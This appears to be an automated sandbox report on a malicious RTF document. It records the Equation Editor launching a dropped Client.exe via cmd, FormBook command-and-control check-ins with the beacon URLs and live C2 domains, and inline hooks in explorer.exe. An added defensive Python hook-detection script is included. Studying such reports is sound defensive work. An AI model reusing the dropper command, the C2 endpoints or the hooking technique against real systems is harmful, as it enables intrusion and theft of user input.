                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):1.1722028273607172
                                                Encrypted:false
                                                SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                Malicious:false
                                                Preview:..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):954368
                                                Entropy (8bit):7.255862647028007
                                                Encrypted:false
                                                SSDEEP:12288:f24dTkV9VXtdGI1HNDT5wQjG6EXPGc/16/PxuepSxmwCD8ik:hs9RauHN/5wa8/L9UueAxmfHk
                                                MD5:B4F00BB75BFD5C4E2C9D0CD6070E8E54
                                                SHA1:EE56EAF9288D5315D51E23C32CD8B11CEFA15E2F
                                                SHA-256:40A539EBB55B0A6A2F1529A733EAF3AA1C48CE467EAEAAA56C851ABF9BDA3006
                                                SHA-512:8CBC3FCF0AD0B985BBA9D489278FB4E8A40F56561B1FFDE8EB8D79EB9E29C0BC224123B209844EB4E3CD758BCBF0FF17FDCAD98D44E7E602F42D6DA2D0541F5C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 24%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.........."...0..|...............@... ....@.. ....................... ............@.....................................K....................................................................................................@..H...........5++..8$ ..... ......................@....text....y...@...z.................. ..`.rsrc...............................@..@.................................... ..`.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:gAWY3n:qY3n
                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                Malicious:true
                                                Preview:[ZoneTransfer]..ZoneId=3..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 9 00:38:02 2022, mtime=Tue Aug 9 00:38:02 2022, atime=Tue Aug 9 00:38:12 2022, length=2870044, window=hide
                                                Category:dropped
                                                Size (bytes):1199
                                                Entropy (8bit):4.599606484788339
                                                Encrypted:false
                                                SSDEEP:24:8BA/XTRKJive0lNHCn9DJeAHCn9tDv3qm1u7D:8BA/XT0iflNHCnJJbHCnmg0D
                                                MD5:FB70B386249D4133C4BAB75CDA40C2F0
                                                SHA1:6EA10AEB53EB1DA991622FD5A9D03AB1A3E989F3
                                                SHA-256:099321B7080DB54AF4916A8A2E456643BAC0B512835E3F3DDFD91125804F3321
                                                SHA-512:F2B59A978A17D42544839F66970F24A64B65EC2EA6F3C7223E12D2413F0D12E56818A272FFAED073173CCB2A9582901018AE6438FEDCB64C26CFB7DD68C27EF8
                                                Malicious:false
                                                Preview:L..................F.... ...................-.......+..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U....Desktop.d......QK.X.U..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...+..U.. .SECURI~1.RTF..........U...U..*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.9.0.5...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\980108\Users.user\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf.J.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.9.0.5...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):146
                                                Entropy (8bit):4.9658261704362445
                                                Encrypted:false
                                                SSDEEP:3:bDuMJluscbcTLqjQWC0LUZAlmxW9rbcTLqjQWC0LUZAlv:bCVwTeS0LHjrwTeS0LH1
                                                MD5:E9FAD3CF5FB87FFCDE0A5322116B439E
                                                SHA1:3FD3EC2D5452FE415C4FB88E3A4362C4F9717D71
                                                SHA-256:811BCE8DBC32271417CC1D639AE63C548BF7641ED1CF3F64531213A332A0C4D5
                                                SHA-512:B49BFBC8009820B9C8B209C7D112A55F1CC30C44D49B14CC1EC748EB1A6AAAB2C588F77E8D38E5475B7E67748E8EE43F8E610800953D1A495B24060144278469
                                                Malicious:false
                                                Preview:[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK=0..[misc]..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK=0..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                                                File type:Rich Text Format data, version 1, unknown character set
                                                Entropy (8bit):4.770913997735828
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
                                                File size:2870044
                                                MD5:8bfea104ae681494896379e3c647f6ae
                                                SHA1:aaf97d8a987c5060ff06c4031030000d53d3cb31
                                                SHA256:2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
                                                SHA512:4803dad9f9afaec9270e2d831de98152fa7307e86114f2d03b950e5486495f7bba97cb0752e13be9ac99756942c219975082b6b6f7877f8e4e3f15bd8403dc9d
                                                SSDEEP:24576:999sNt+S9dUJrMbKlvqr/OwJJZ5ic4Uez5NwoQu37WBQ3a95HX:Y
                                                TLSH:CCD5A570B1B535C6E26F0172429FBC59521738C3B3C62D88815DEAF62ED4B7A7B41A0E
                                                File Content Preview:{\rtf1{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnhang {\pnt
                                                Icon Hash:e4eea2aaa4b4b4a4
                                                Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
                                                0 | 000012A7h | 2 | embedded | Package | 954535 | Client.exe | C:\Path\Client.exe | C:\Path\Client.exe | no
                                                1 | 001DC2BCh | 2 | embedded | Equation.3 | 3072 | | | | no
                                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                08/08/22-18:39:45.738853 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                08/08/22-18:40:04.832440 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49172 | 80 | 192.168.2.22 | 104.167.67.175
                                                08/08/22-18:39:45.738853 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                08/08/22-18:40:04.832440 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49172 | 80 | 192.168.2.22 | 104.167.67.175
                                                08/08/22-18:39:45.738853 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                08/08/22-18:40:04.832440 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49172 | 80 | 192.168.2.22 | 104.167.67.175
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Aug 8, 2022 18:39:45.721043110 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                Aug 8, 2022 18:39:45.738465071 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
                                                Aug 8, 2022 18:39:45.738708019 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                Aug 8, 2022 18:39:45.738852978 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                Aug 8, 2022 18:39:45.756073952 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
                                                Aug 8, 2022 18:39:46.209754944 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
                                                Aug 8, 2022 18:39:46.209817886 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
                                                Aug 8, 2022 18:39:46.209853888 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
                                                Aug 8, 2022 18:39:46.209891081 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
                                                Aug 8, 2022 18:39:46.209923983 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
                                                Aug 8, 2022 18:39:46.210068941 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                Aug 8, 2022 18:39:46.210129976 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                Aug 8, 2022 18:39:46.210244894 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                Aug 8, 2022 18:39:46.227530956 CEST | 80 | 49171 | 66.235.200.170 | 192.168.2.22
                                                Aug 8, 2022 18:39:46.227902889 CEST | 49171 | 80 | 192.168.2.22 | 66.235.200.170
                                                Aug 8, 2022 18:40:04.628437996 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
                                                Aug 8, 2022 18:40:04.814755917 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
                                                Aug 8, 2022 18:40:04.814852953 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
                                                Aug 8, 2022 18:40:04.832439899 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
                                                Aug 8, 2022 18:40:05.021908045 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
                                                Aug 8, 2022 18:40:05.021940947 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
                                                Aug 8, 2022 18:40:05.021955013 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
                                                Aug 8, 2022 18:40:05.022198915 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
                                                Aug 8, 2022 18:40:05.048086882 CEST | 49172 | 80 | 192.168.2.22 | 104.167.67.175
                                                Aug 8, 2022 18:40:05.233951092 CEST | 80 | 49172 | 104.167.67.175 | 192.168.2.22
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Aug 8, 2022 18:39:45.500391006 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
                                                Aug 8, 2022 18:39:45.673486948 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
                                                Aug 8, 2022 18:40:04.426235914 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
                                                Aug 8, 2022 18:40:04.601803064 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                Aug 8, 2022 18:39:45.500391006 CEST | 192.168.2.22 | 8.8.8.8 | 0xca6d | Standard query (0) | www.thegoldencamel.online | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 18:40:04.426235914 CEST | 192.168.2.22 | 8.8.8.8 | 0x1666 | Standard query (0) | www.best-boy.net | A (IP address) | IN (0x0001)
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                Aug 8, 2022 18:39:45.673486948 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | www.thegoldencamel.online | thegoldencamel.online | | CNAME (Canonical name) | IN (0x0001)
                                                Aug 8, 2022 18:39:45.673486948 CEST | 8.8.8.8 | 192.168.2.22 | 0xca6d | No error (0) | thegoldencamel.online | | 66.235.200.170 | A (IP address) | IN (0x0001)
                                                Aug 8, 2022 18:40:04.601803064 CEST | 8.8.8.8 | 192.168.2.22 | 0x1666 | No error (0) | www.best-boy.net | | 104.167.67.175 | A (IP address) | IN (0x0001)
                                                • www.thegoldencamel.online
                                                • www.best-boy.net
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                0 | 192.168.2.22 | 49171 | 66.235.200.170 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 18:39:45.738852978 CEST | 0 | OUT | GET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1
                                                Host: www.thegoldencamel.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 18:39:46.209754944 CEST | 2 | IN | HTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 16:39:46 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://www.thegoldencamel.online/wp-json/>; rel="https://api.w.org/"
                                                Vary: Accept-Encoding
                                                X-Endurance-Cache-Level: 2
                                                X-nginx-cache: WordPress
                                                CF-Cache-Status: MISS
                                                Server: cloudflare
                                                CF-RAY: 7379b09ee927997b-FRA
                                                Data Ascii: 16a3<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v19.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - The Golden Camel</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - The Golden Camel" /><meta property="og:site_name" content="The Golden Camel" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.thegoldencamel.online/#organization","name":"The Golden Camel","url":"https://www.thegoldencamel.online/","sameAs":[],"log
                                                Aug 8, 2022 18:39:46.209817886 CEST | 3 | IN | Data Raw: 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f
                                                Data Ascii: o":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.thegoldencamel.online/#/schema/logo/image/","url":"https://www.thegoldencamel.online/wp-content/uploads/2022/08/cropped-The_Golden_Camel_2.png","contentUrl":"https://www.thegold
                                                Aug 8, 2022 18:39:46.209853888 CEST | 4 | IN | Data Raw: 61 79 65 72 5f 61 6a 61 78 75 72 6c 20 3d 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 77 70 2d 61 64 6d 69 6e 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 3f 22 3b 0a 76 61 72 20 70
                                                Data Ascii: ayer_ajaxurl = "https://www.thegoldencamel.online/wp-admin/admin-ajax.php?";var pagelayer_global_nonce = "7e9fbd5cb7";var pagelayer_server_time = 1659976786;var pagelayer_is_live = "";var pagelayer_facebook_id = "";var pagelayer_settings
                                                Aug 8, 2022 18:39:46.209891081 CEST | 6 | IN | Data Raw: 2d 61 63 63 65 6e 74 3a 23 36 31 63 65 37 30 3b 2d 2d 70 61 67 65 6c 61 79 65 72 2d 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4f 70 65 6e 20 53 61 6e 73 3b 2d 2d 70 61 67 65 6c 61 79 65 72 2d 66 6f 6e 74 2d 73 65
                                                Data Ascii: -accent:#61ce70;--pagelayer-font-primary-font-family:Open Sans;--pagelayer-font-secondary-font-family:Roboto;--pagelayer-font-text-font-family:Montserrat;--pagelayer-font-accent-font-family:Poppins;}.pagelayer-row-stretch-auto > .pagelayer-ro
                                                Aug 8, 2022 18:39:46.209923983 CEST | 7 | IN | Data Raw: 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 66 66 7d 0a 62 6f 64 79 2e 70 61 67 65 6c 61 79 65 72 2d 62 6f 64 79 20 68 33 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 55 62 75 6e 74 75 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 35 70 78 3b 66 6f 6e
                                                Data Ascii: ht:1;color:#000000ff}body.pagelayer-body h3{font-family:Ubuntu;font-size:35px;font-weight:500;text-transform:uppercase;line-height:1;color:#000000ff}body.pagelayer-body h4{font-family:Ubuntu;font-size:28px;font-weight:400;text-transform:uppe


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                1 | 192.168.2.22 | 49172 | 104.167.67.175 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Aug 8, 2022 18:40:04.832439899 CEST | 8 | OUT | GET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1
                                                Host: www.best-boy.net
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 18:40:05.021908045 CEST | 9 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Mon, 08 Aug 2022 16:40:01 GMT
                                                Content-Type: text/html
                                                Content-Length: 2158
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>,&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#30007;&#22899;&#21866;&#28608;&#28872;&#39640;&#28526;&#21943;&#27700;&#21160;&#24577;&#22270;</title><meta name="keywords" content=",&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#30007;&#22899;&#21866;&#28608;&#28872;&#39640;&#28526;&#21943;&#27700;&#21160;&#24577;&#22270;" /><meta name="description" content=",&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345
                                                Aug 8, 2022 18:40:05.021940947 CEST10INData Raw: 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b
                                                Data Ascii: ;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;


Code Manipulations

Function Name   Hook Type   Active in Processes
PeekMessageA    INLINE      explorer.exe
PeekMessageW    INLINE      explorer.exe
GetMessageW     INLINE      explorer.exe
GetMessageA     INLINE      explorer.exe

Function Name   Hook Type   New Data
PeekMessageA    INLINE      0x48 0x8B 0xB8 0x8F 0xFE 0xE6
PeekMessageW    INLINE      0x48 0x8B 0xB8 0x87 0x7E 0xE6
GetMessageW     INLINE      0x48 0x8B 0xB8 0x87 0x7E 0xE6
GetMessageA     INLINE      0x48 0x8B 0xB8 0x8F 0xFE 0xE6
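
The four inline hooks above sit on the APIs an application calls to pull keyboard and other input messages off its message queue, which is where a stealer injected into explorer.exe can see keystrokes before the window procedure does. The check a responder wants is a comparison of each exported function's first bytes in the live process against the same bytes in the clean on-disk image, plus decoding of the common trampoline stubs so the hook target can be followed. The Python below is an added example and not code from the report, from Joe Sandbox or from the malware; reading the two byte sequences out of a real process and DLL (ReadProcessMemory and a PE export walk) is left to the caller, the clean prolog bytes are a hypothetical MSVC-style entry sequence used only so the example runs offline, and the function entry address is a placeholder. The six New Data bytes the report captured for each hooked function are fed in as-is; they do not match any of the jump stubs decoded here, so it is the divergence from the clean bytes that flags them.

```python
"""Inline-hook check for exported function prologs (added example, not report code)."""
import struct

PROLOG_LEN = 16  # bytes compared at the function entry


def parse_sandbox_bytes(text: str) -> bytes:
    """Parse the '0x48 0x8B ...' notation used in the report's New Data column."""
    return bytes(int(tok, 16) for tok in text.split())


def classify_trampoline(entry: int, code: bytes) -> dict:
    """Decode the common x86/x64 hook stubs written over a function prolog.

    entry is the virtual address of the function and is needed to resolve
    relative jumps.  Byte patterns not recognised here are still reported as
    patched by detect_hook; this only adds a decoded target when it can.
    """
    mask = 0xFFFFFFFFFFFFFFFF
    if len(code) >= 5 and code[0] == 0xE9:                       # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return {"kind": "jmp rel32", "target": (entry + 5 + rel) & mask}
    if len(code) >= 6 and code[:2] == b"\xFF\x25":               # jmp [rip+disp32] (x64)
        disp = struct.unpack_from("<i", code, 2)[0]
        return {"kind": "jmp [rip+disp32]", "pointer_slot": (entry + 6 + disp) & mask}
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return {"kind": "mov rax, imm64; jmp rax",               # absolute x64 stub
                "target": struct.unpack_from("<Q", code, 2)[0]}
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:   # push imm32; ret (x86)
        return {"kind": "push imm32; ret", "target": struct.unpack_from("<I", code, 1)[0]}
    return {"kind": "unrecognised"}


def detect_hook(name: str, entry: int, live: bytes, clean: bytes) -> dict:
    """Compare live prolog bytes with the clean image and describe any patch."""
    n = min(len(live), len(clean), PROLOG_LEN)
    live, clean = live[:n], clean[:n]
    if live == clean:
        return {"function": name, "hooked": False}
    first_diff = next(i for i in range(n) if live[i] != clean[i])
    result = {"function": name, "hooked": True, "first_diff_offset": first_diff,
              "live": live.hex(), "clean": clean.hex()}
    result.update(classify_trampoline(entry, live))
    return result


# New Data values from the report's Code Manipulations table (explorer.exe).
REPORT_NEW_DATA = {
    "PeekMessageA": "0x48 0x8B 0xB8 0x8F 0xFE 0xE6",
    "PeekMessageW": "0x48 0x8B 0xB8 0x87 0x7E 0xE6",
    "GetMessageW":  "0x48 0x8B 0xB8 0x87 0x7E 0xE6",
    "GetMessageA":  "0x48 0x8B 0xB8 0x8F 0xFE 0xE6",
}

# Hypothetical clean prolog (mov [rsp+8],rbx; mov [rsp+10h],rsi; push rdi;
# sub rsp,20h).  On a real host read these bytes from the DLL file on disk.
CLEAN_PROLOG = bytes.fromhex("48895c24084889742410574883ec20")


def scan_report_hooks(entry: int = 0x7FF800001000) -> list:
    """Run the check over the four hooked functions listed in the report."""
    return [detect_hook(name, entry, parse_sandbox_bytes(raw), CLEAN_PROLOG)
            for name, raw in REPORT_NEW_DATA.items()]


if __name__ == "__main__":
    for finding in scan_report_hooks():
        print(finding)
```

On a live system take the clean bytes from the module's file on disk rather than from another process, since the hook may be installed in every process that loaded user32, and compare a full 16 bytes rather than only the first five.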


                                                Target ID:0
                                                Start time:18:38:13
                                                Start date:08/08/2022
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f020000
                                                File size:1423704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:2
                                                Start time:18:38:16
                                                Start date:08/08/2022
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:3
                                                Start time:18:38:17
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:CmD.exe /C %tmp%\Client.exe A C
                                                Imagebase:0x4a120000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:6
                                                Start time:18:38:18
                                                Start date:08/08/2022
                                                Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                Imagebase:0xa20000
                                                File size:954368 bytes
                                                MD5 hash:B4F00BB75BFD5C4E2C9D0CD6070E8E54
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
